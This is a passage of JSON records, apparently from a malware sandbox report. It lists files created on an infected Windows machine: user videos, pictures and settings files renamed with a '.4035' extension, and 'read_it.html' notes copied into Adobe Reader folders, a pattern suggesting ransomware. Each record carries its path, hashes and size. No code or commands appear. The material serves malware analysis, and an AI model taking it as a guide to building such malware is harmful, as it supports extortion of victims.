10.0\\reader\\idtemplates\\hrv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_511", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_512", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_513", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/004e8bdb368b50194d9c25fecfbe020d9d86be39", "file_type": "created_file", "id": "file_10", "md5_hash": "fe304b21152c6183d960d4d4f2fadfa7", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\1og0qp3fd-msljbk.mp4.4035", "sha1_hash": "004e8bdb368b50194d9c25fecfbe020d9d86be39", "sha256_hash": "ee5adcf4e79cc073d6c4e700a86b3649e04b391cd8ea1b37aed6f97168678968", "size": 76346, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/17b0a0387f65b70c9f112dc86c3c12be69f6b374", "file_type": "created_file", "id": "file_13", "md5_hash": "ca471b303bbcbe0ad8f75bb9ea51caa7", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\desktop.ini.4035", "sha1_hash": "17b0a0387f65b70c9f112dc86c3c12be69f6b374", "sha256_hash": "f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078", "size": 1456, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/7ffce778d8903b262ccda9b006b42a5b09e7be5c", "file_type": "created_file", "id": "file_15", "md5_hash": "54d39d6df8bd6e4dad3ef0a200b1fc01", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\kyzg9qjv.mp4.4035", "sha1_hash": "7ffce778d8903b262ccda9b006b42a5b09e7be5c", "sha256_hash": "4a8f4b88fdcd37b28464fcd3aa152ae7212fd3193012555a77e029d355f69ebe", "size": 11882, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8", "file_type": "created_file", "id": "file_17", "md5_hash": "1f9cd2933ccd0ad365d4f4f5f5612b66", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\mrbfxb6wzfjqjhj.avi.4035", "sha1_hash": "87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8", "sha256_hash": "c46e934742e11e288141a5aaf6034d98ac70da5e945b6e911951707fe6fc5123", "size": 89968, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/50e18c7f0382d79f9ead32dccacdc17f75732b50", "file_type": "created_file", "id": "file_19", "md5_hash": "fd493a66de029ffcc0d444f5fe718552", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\oau1-cqboi.flv.4035", "sha1_hash": "50e18c7f0382d79f9ead32dccacdc17f75732b50", "sha256_hash": "a3ec86bd020563f08ee4b3e7d0d2b280417f10d85a285521b96a45034c60f9dd", "size": 12834, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/62cee0a5918316782b21e0a89e01acc1117de038", "file_type": "created_file", "id": "file_21", "md5_hash": "c694568c984ebf5cce602a04c2efda21", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\rqt04-sfczoy.swf.4035", "sha1_hash": "62cee0a5918316782b21e0a89e01acc1117de038", "sha256_hash": "9b59a1694754df96e99379fdc9e6dc73f70b85852f25f6de038dbb38fe686331", "size": 3424, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c2a1862900dd2fefb0dcb6f2b265d7acca289e35", "file_type": "created_file", "id": "file_23", "md5_hash": "dad6d1cb627c5dc66f8beff124601e0e", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zpls8lo4rhe9i.flv.4035", "sha1_hash": "c2a1862900dd2fefb0dcb6f2b265d7acca289e35", "sha256_hash": "dd4dc5a5d3c0ec1f604c33192bafd94fe9882fe379827bf8ae88e23ee044eb29", "size": 74144, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/95cc6459fcb6c1ad165f6887984c7adabe08f8f2", "file_type": "created_file", "id": "file_24", "md5_hash": "d0cec1d4c1992fe96781e4402b1d46e0", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zsxmbwqk2e.avi.4035", "sha1_hash": "95cc6459fcb6c1ad165f6887984c7adabe08f8f2", "sha256_hash": "5415b7a8aaa81629283109b62759ca0500df5f88ac150d75135de779ea3a56f3", "size": 70784, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/12118ef85937c348c4022afe182026fb126b0da1", "file_type": "created_file", "id": "file_25", "md5_hash": "492d060d626d9dc07fbcb27982e6ef3a", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\6nqrr.flv.4035", "sha1_hash": "12118ef85937c348c4022afe182026fb126b0da1", "sha256_hash": "ace5ac98b22860209f1aa0c26fc48d0205533f625790c89186538761a374875e", "size": 68992, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ac586da11c9249e24dcd99c4f15464695dec4c8d", "file_type": "created_file", "id": "file_27", "md5_hash": "5d6e37aebb92ce0df15c8a46eead4cd4", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cacxexcsoudw1ihbrvjj.flv.4035", "sha1_hash": "ac586da11c9249e24dcd99c4f15464695dec4c8d", "sha256_hash": "6dcfd324d7d5a21ddac1250dd8178b4f3c7bb10e20b0ff31a2f702ed377fd68a", "size": 74112, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ca28891089e1a5b7c34500b8e594e28d5740ae2e", "file_type": "created_file", "id": "file_28", "md5_hash": "33ae70ed9c02375810fc6fc8e8b135e0", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cpe6b9cb6wzufywlybxe.avi.4035", "sha1_hash": "ca28891089e1a5b7c34500b8e594e28d5740ae2e", "sha256_hash": "7d02c09f0f1790b1d2f9ded6c71782b7fc3fe774705ecca45d305a38e3811c82", "size": 27288, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a21dd60d35f9009c4fc05931662b8b25022be7d9", "file_type": "created_file", "id": "file_29", "md5_hash": "d16da673151ea6951850e3808dd7144f", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\kn8m4xkhxs.mp4.4035", "sha1_hash": "a21dd60d35f9009c4fc05931662b8b25022be7d9", "sha256_hash": "1a80b46ef495666e719a5006388e447a52017b15794176d1b398f8947499421e", "size": 43944, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f8a6d0724f2efe4e93604249294fc93628f33e4c", "file_type": "created_file", "id": "file_30", "md5_hash": "013ceea4037ddfefe93741258ac33658", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\nac 5jyw.mp4.4035", "sha1_hash": "f8a6d0724f2efe4e93604249294fc93628f33e4c", "sha256_hash": "cbe47e10eb172c1a5a03b9e1b4351c85e5ff736495ad42af53af83d3c8c0730d", "size": 72368, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/32ff4ba11cbb90f56d35ac726674d121c8fa46ce", "file_type": "created_file", "id": "file_31", "md5_hash": "a92352091958533a7039305745544a10", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\t4ped9h1nce.avi.4035", "sha1_hash": "32ff4ba11cbb90f56d35ac726674d121c8fa46ce", "sha256_hash": "fa5bac0cb713347c8011f6c80672d8a606b0f51643daf425fc498c8809124e4f", "size": 12875, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/eda688df10bc5a6300efeb01c69d1879ecdc63fe", "file_type": "created_file", "id": "file_32", "md5_hash": "c0dbd7f6edf6c4e149d440d87521268f", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\z5ebmfgj8h8.avi.4035", "sha1_hash": "eda688df10bc5a6300efeb01c69d1879ecdc63fe", "sha256_hash": "19e3e71c9fbf6f95cbfe3b7f6a64f9c80414b3d211b87182d3a43b7ebacacd26", "size": 63201, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/14e003faacd2e2541db9b07841248893a65580aa", "file_type": "created_file", "id": "file_33", "md5_hash": "b267271a13f0b14a5502c08d06ce76ad", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\f zdvb2r.avi.4035", "sha1_hash": "14e003faacd2e2541db9b07841248893a65580aa", "sha256_hash": "fa8d6a555688a9942035789aba025c9adfa1b479e6398b61eb0f915644589fbf", "size": 100240, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ec1e80620dc9519f67c94c40d2255c13272f201a", "file_type": "created_file", "id": "file_35", "md5_hash": "668d201f49f3175e7cff2f688233071d", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fnm9ey1oqb.swf.4035", "sha1_hash": "ec1e80620dc9519f67c94c40d2255c13272f201a", "sha256_hash": "10065789372b36ee5df684dcdd134b3187e2f3333b4d26743271382049b8fcba", "size": 81114, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b921f60ea7d5d5b2843019c22ceddbc925751cc6", "file_type": "created_file", "id": "file_36", "md5_hash": "f6201cea6fef7e3108d663373a800a83", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fv9tkzgsub.mp4.4035", "sha1_hash": "b921f60ea7d5d5b2843019c22ceddbc925751cc6", "sha256_hash": "2272f5c2a80846c401a8d5d79aa2dff3f4fd6ed056c0b7cb7cd87a186efb5e04", "size": 83616, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/98d4ec976a6175a79ecb49798401a9a481c10edc", "file_type": "created_file", "id": "file_37", "md5_hash": "6545ea5d0b7befda6d34fa57dce3dd9d", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ockbgbvfktod_qgfrkqn.swf.4035", "sha1_hash": "98d4ec976a6175a79ecb49798401a9a481c10edc", "sha256_hash": "d03b4ccaee9b7f9b7e80d5f0e3aad03b28f9ac9ab5f9968a5d1b7ab3f44c85ce", "size": 17872, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9453edd5b686a33b834d503baa6f0e9f6e973c8a", "file_type": "created_file", "id": "file_38", "md5_hash": "f8309ba83b0065a1b859c7b642fd9131", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\oisajrkn_h.mkv.4035", "sha1_hash": "9453edd5b686a33b834d503baa6f0e9f6e973c8a", "sha256_hash": "dbeda6849235fef5bd8e93626dcc68b3a47db7accf65b8e9ab9ce52dfcaea94f", "size": 2896, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8052cd1b8cd81f3af82c39afe61f4033cec83930", "file_type": "created_file", "id": "file_39", "md5_hash": "b5d2b2904421f460f0ee82e851a1c73b", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\tetxjj37r28jw0n.mp4.4035", "sha1_hash": "8052cd1b8cd81f3af82c39afe61f4033cec83930", "sha256_hash": "b1d597435da49e4db2d6deddc06f36f109eede08ddf5c8b62a916253aca12a4c", "size": 24512, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/821665b9a25aa3c91c7e00b7cb0bf40f961dbd4c", "file_type": "created_file", "id": "file_40", "md5_hash": "58369a36db14e6595a789851b283d61d", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\xhlr3jry9wkpax.mp4.4035", "sha1_hash": "821665b9a25aa3c91c7e00b7cb0bf40f961dbd4c", "sha256_hash": "31daeaf2a8429e7790d3b2028937cec58f90bf48dc38895eb97c1652e8935360", "size": 38384, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9c33c23391c521cadbbaf3f48318bd8be19b9d17", "file_type": "created_file", "id": "file_41", "md5_hash": "b66d48e45ccae67e28d346f780e87270", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ybwcw_epzk5by0z.mkv.4035", "sha1_hash": "9c33c23391c521cadbbaf3f48318bd8be19b9d17", "sha256_hash": "b264303c73b0013757fabc7876459909651655deea5e77caf92ccf121be0be60", "size": 55728, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6b4cea08a912e6790a1bf97ebc31c5a556fc9c5a", "file_type": "created_file", "id": "file_42", "md5_hash": "4c550a4ad0eed37b442cffd2d373762a", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\zmkog8xlo9rcs.mkv.4035", "sha1_hash": "6b4cea08a912e6790a1bf97ebc31c5a556fc9c5a", "sha256_hash": "78d05e7485ed6429798f62fa257434d12232e3d4bf2e398a0ef60c4d85165d77", "size": 20688, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a602ebd54a826dfa56af05987dc72f68776f9521", "file_type": "created_file", "id": "file_43", "md5_hash": "78bf02a3925027ace179e23ccb256869", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\2i7jnwg0lwz13o.flv.4035", "sha1_hash": "a602ebd54a826dfa56af05987dc72f68776f9521", "sha256_hash": "0246bd496eec13d9e735a0630b05e188b39f901ab5163d439e0fab04aa969c00", "size": 22512, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c5b77bbaf011174e11489bcfbd03d58484eaf10d", "file_type": "created_file", "id": "file_45", "md5_hash": "10708f3fb882e3d5f2b9417728f55c10", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\55qynpcjbwzw8f.swf.4035", "sha1_hash": "c5b77bbaf011174e11489bcfbd03d58484eaf10d", "sha256_hash": "f703a89cc68563b310e3be883e34016ffdb1d842363b2cf10796175437f2bc7a", "size": 28272, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a2d1a927685967566b64629315f52a1cd4cb9821", "file_type": "created_file", "id": "file_46", "md5_hash": "ca915502ceff9cde07b51cb12ed7107f", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\mrd3l.mp4.4035", "sha1_hash": "a2d1a927685967566b64629315f52a1cd4cb9821", "sha256_hash": "1b91b76556c9bce0ed9dd528ba9bebc06465c9f8ba980708ec23a2ab30c4ae12", "size": 101648, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/df49e469711f447f0564ab9b1cce6df46b67876d", "file_type": "created_file", "id": "file_47", "md5_hash": "cc402bf50867ad79be1ae0c7960928f8", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\zgirtybopanwcif8o1.swf.4035", "sha1_hash": "df49e469711f447f0564ab9b1cce6df46b67876d", "sha256_hash": "c2a9e5ac5a555346e999bb9d0b416877af5092c74fd07a5f1890d44786d72e7d", "size": 66832, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/12d2f682467fed2c730f690c8e71f1fa6c9c16d3", "file_type": "created_file", "id": "file_48", "md5_hash": "279891bd6c623ef3ffa2e21ddf63237b", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\desktop.ini.4035", "sha1_hash": "12d2f682467fed2c730f690c8e71f1fa6c9c16d3", "sha256_hash": "e1f69d779be647ec59560178cc9c8117ec15874b87898365129eaa7a758e0672", "size": 1472, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/44e35c6765d5b032ec350b0fd76db606b3ada11b", "file_type": "created_file", "id": "file_50", "md5_hash": "0ca019a9e1bd7e47a87cc6b550e74794", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\everywhere.search-ms.4035", "sha1_hash": "44e35c6765d5b032ec350b0fd76db606b3ada11b", "sha256_hash": "5caa05d36fdce39064c466dcd1d1e752afa5c81c18cd7567ba20e8282088c3c4", "size": 1200, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8be6133aae04cb697aa897b2bc29b129e1dff3a8", "file_type": "created_file", "id": "file_51", "md5_hash": "9af2058747ac183509e2234c230fb7ea", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\indexed locations.search-ms.4035", "sha1_hash": "8be6133aae04cb697aa897b2bc29b129e1dff3a8", "sha256_hash": "7fbc4231ab10e7f7050da43035cdee104a4d1152df2bad05250f03ac71ca24c1", "size": 1200, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0418b977bf07ec646c4d37080d7d652b221e8ae0", "file_type": "created_file", "id": "file_52", "md5_hash": "8ddb4bceb0d12f39dddf4247f8dc193a", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\desktop.ini.4035", "sha1_hash": "0418b977bf07ec646c4d37080d7d652b221e8ae0", "sha256_hash": "ce68f1294c3d128cf4a4c9eed21fc60673572b909ede222cae8bca8d28193932", "size": 1232, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a54937aa85686b6e656afd83c46952aca1e57928", "file_type": "created_file", "id": "file_54", "md5_hash": "16ef20050d6118d05d4276b949a9da27", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\2b4wmbwvq9snluu4mk.bmp.4035", "sha1_hash": "a54937aa85686b6e656afd83c46952aca1e57928", "sha256_hash": "0f0d2249f84ab0ed7073be3c097cb48c5bc8a95f4a839ad1c7d3e6a92d3c9e49", "size": 25872, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ed0c2be13590039a762b112a9a8d1ed90591032b", "file_type": "created_file", "id": "file_56", "md5_hash": "e4327e932fcd51b00be6b63f1f26dd07", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\3jtcbgjtkksxrdhl2vx.bmp.4035", "sha1_hash": "ed0c2be13590039a762b112a9a8d1ed90591032b", "sha256_hash": "5b0042c8fc3ad3a173ef46f55c4771d3bed87d9b09bd3146bb0112e069157a76", "size": 43040, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6ea225e98a03a477fdf27b0a284125313fbd66ca", "file_type": "created_file", "id": "file_57", "md5_hash": "d6d61bb1c14fe4d7ebfd1cc156376e1e", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\4tyovjchur84aw.gif.4035", "sha1_hash": "6ea225e98a03a477fdf27b0a284125313fbd66ca", "sha256_hash": "864cf2df1ba5984ed77ea6aaf21bdf81da3d45200e6387ede02058cc5917f67d", "size": 76518, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3c8aa32a13a37993d55d8fe5b8c65e23933134a6", "file_type": "created_file", "id": "file_58", "md5_hash": "e2695b4e6c53876161fbd5711187ac9c", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6bloetbft_jtjmwtwvvk.gif.4035", "sha1_hash": "3c8aa32a13a37993d55d8fe5b8c65e23933134a6", "sha256_hash": "be07b45b701687c60d85266d0f3a8c35c00d5d1d0a569b96cc2f8736d1766dea", "size": 68208, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/c9d84ea937d475ca0cf56d99873fcc8f90525c4c", "file_type": "created_file", "id": "file_59", "md5_hash": "dc6c0d2bf7447847b1292f5ea5d19266", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\6qfpygn63k3cnso.gif.4035", "sha1_hash": "c9d84ea937d475ca0cf56d99873fcc8f90525c4c", "sha256_hash": "199f42cb2e2c868e3be063ef6e9d06651e50713c9ca894e5157ce65a8bdd7898", "size": 36208, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/bd177a3c4abccc0b7fdbd2e22dbf31b9a8ae171c", "file_type": "created_file", "id": "file_60", "md5_hash": "837c0ce4cfa32ce41c538836a136f29e", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\70yieg1gzzxq5b23s.png.4035", "sha1_hash": "bd177a3c4abccc0b7fdbd2e22dbf31b9a8ae171c", "sha256_hash": "1abcc8e53a2e01419d0b9d6cc7cdc09033f39daf8ce105be4b3d1d403efc7acb", "size": 37792, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/dd93c574932a84bd0a1d8900bb6fe7c9ddd5b267", "file_type": "created_file", "id": "file_61", "md5_hash": "4794438ee0b8191d7677aba8026bcbaa", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\7er4.gif.4035", "sha1_hash": "dd93c574932a84bd0a1d8900bb6fe7c9ddd5b267", "sha256_hash": "8ac6d66c9664ec6c5b5f3e3d9127f1427fbac7b2400c89e14868d5ccd6c63377", "size": 100400, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/baca70a91ca496f795668d8c4c92ef7b64f4ab33", "file_type": "created_file", "id": "file_62", "md5_hash": "7c0687ae9c177157f36a58f0f179ec33", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\a3l wgby9v41odw.bmp.4035", "sha1_hash": "baca70a91ca496f795668d8c4c92ef7b64f4ab33", "sha256_hash": "fc1c35ced2205a0c07d6097236cc1a1fb721f9e9552837929b78abb1a0702158", "size": 31248, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/aa21580bd2c759b0d7e20b361c99c0dc4a165280", "file_type": "created_file", "id": "file_63", "md5_hash": "1adc5c394adb07ac7f2a6edc35655b01", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\bazjhbm7.jpg.4035", "sha1_hash": "aa21580bd2c759b0d7e20b361c99c0dc4a165280", "sha256_hash": "97c428b1b036457703936b271228699bd116e399d1a5b01db603665a282f1b1a", "size": 79647, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/eaa6dad5e0736f81c8e6a3baedd93d9ff4b04ec4", "file_type": "created_file", "id": "file_64", "md5_hash": "fae4aca400a240e9ee4af690f4864c7d", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\desktop.ini.4035", "sha1_hash": "eaa6dad5e0736f81c8e6a3baedd93d9ff4b04ec4", "sha256_hash": "c7a17a3103762701f5290d59e40d6f195a594e97b800de51c8546a8117ceb721", "size": 1456, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8b2844a640ccf135abbe71ef70e98881729476c6", "file_type": "created_file", "id": "file_65", "md5_hash": "10a232191183067a720c8fb8924d21c6", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\l5w5ag34.png.4035", "sha1_hash": "8b2844a640ccf135abbe71ef70e98881729476c6", "sha256_hash": "5120b66ae778d5c7196e33e0f26c39c912c5ebace2055a942f987d1c12315801", "size": 39040, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/8659d3027ac844883ae03898b712215556684986", "file_type": "created_file", "id": "file_158", "md5_hash": "9918d934d1d114724c06920b676a815d", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.ini.4035", "sha1_hash": "8659d3027ac844883ae03898b712215556684986", "sha256_hash": "89eceb1c978b7a681b80ed3b90118427096a598e4fe596d3fb575fbb58d31835", "size": 976, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9d3863811bff04541156538a817e44a9c96d5808", "file_type": "created_file", "id": "file_160", "md5_hash": "07e593200b1b6d5fb49923941f54ae70", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\favorites.vss.4035", "sha1_hash": "9d3863811bff04541156538a817e44a9c96d5808", "sha256_hash": "92704ace6eb1bcd48171014583d1773925b81177b28edb996f9d723fc0839602", "size": 1840, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/cf64d8f56f88c0232b1aee4150d3480e76008ef8", "file_type": "created_file", "id": "file_161", "md5_hash": "a10770cb938bae102f32772124ffb4cc", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\parent.lock.4035", "sha1_hash": "cf64d8f56f88c0232b1aee4150d3480e76008ef8", "sha256_hash": "3eac792562300288986dacc00cce93bec2873aa2727b3676ffb9d371e11207d8", "size": 1840, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f903a930195b60e289f6abc2403a6c6e47e106cf", "file_type": "created_file", "id": "file_162", "md5_hash": "5b7014469b38ccb7195dae29fa8ad4e1", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\.metadata.4035", "sha1_hash": "f903a930195b60e289f6abc2403a6c6e47e106cf", "sha256_hash": "c230b613368895a42fe5c009b63a80e8b9346b4f7712b313868d6ea6326e2913", "size": 1840, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/0e99f7e4ff4e7d30f6bf668a3dc40e7c57ae97a9", "file_type": "created_file", "id": "file_164", "md5_hash": "9ad5ee48fc734fab6e97401208e1e8da", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js.4035", "sha1_hash": "0e99f7e4ff4e7d30f6bf668a3dc40e7c57ae97a9", "sha256_hash": "154d3a906ea0c25907f82cc049815f986c444f9b45013d6ea549b3dd6100ba62", "size": 1840, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/daadc81e5bff5203214b828977e2977ec755aef3", "file_type": "created_file", "id": "file_165", "md5_hash": "10bbe90333794c619387b038e1025124", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\iconcache.db.4035", "sha1_hash": "daadc81e5bff5203214b828977e2977ec755aef3", "sha256_hash": "b5e724b03ca68fbdf1f18394f1237dd8acf8c340ebf1c707fedea2727c927b48", "size": 1166432, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/1878eb93b6b4e7ba4de0a9557ae3ef070281a1ac", "file_type": "created_file", "id": "file_166", "md5_hash": "7dd2a9ec73191e19652ef70335b4c59f", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\adobearm.log.4035", "sha1_hash": "1878eb93b6b4e7ba4de0a9557ae3ef070281a1ac", "sha256_hash": "8ac7b9d4e5ed532447d3187630ed7b32265e1ba5930611d40b7ce66c9af17a19", "size": 1664, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/429e061c6f1973cad0ab9b5419640409e8659779", "file_type": "created_file", "id": "file_167", "md5_hash": "149a550984bbb76d5a52897b39893287", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst2635.tmp.4035", "sha1_hash": "429e061c6f1973cad0ab9b5419640409e8659779", "sha256_hash": "938bc773e3a74abf0682baa11516e07514c91840a2ce08c274b7daa9c73664db", "size": 1840, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/69b70805d064ee4c697dbb354aa3395dc4b657ab", "file_type": "created_file", "id": "file_168", "md5_hash": "3889dd6c5e649a56f64282ed3ea9ea25", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\bst28b4.tmp.4035", "sha1_hash": "69b70805d064ee4c697dbb354aa3395dc4b657ab", "sha256_hash": "cb5b6f812df2708df4ddc06f93206c342eff19b37f5a63143579411c8e31b1d9", "size": 1840, "type": "extracted_file", "version": 1 }, { 